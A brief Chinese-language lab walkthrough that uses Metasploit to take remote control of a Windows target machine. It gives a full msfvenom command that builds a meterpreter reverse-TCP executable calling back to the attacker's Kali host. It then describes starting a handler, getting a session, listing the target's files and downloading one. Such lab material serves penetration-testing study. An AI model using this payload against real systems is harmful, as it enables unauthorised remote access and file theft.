1、生成被控端
使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.128 lport=5000 -f exe -o /root/mydir/payload.exe
这里我们使用msfvenom来生成一个被控端程序,用于windows平台下的被控端程序:windows/meterpreter/reverse_tc,lhost的值为kali的ip,该程序的保存位置为:/root/payload.exe
2、启动主控端
打开终端输入命令:msfconsole启动Metasploit,使用handler作为主控端
3、在靶机中运行被控端程序
回到kali中,发现在Metasploit中打开了一个session
4、查看靶机系统上所有的文件
4、下载靶机上的文件
可以看到,已经成功从靶机上下载 efssetup_20181.exe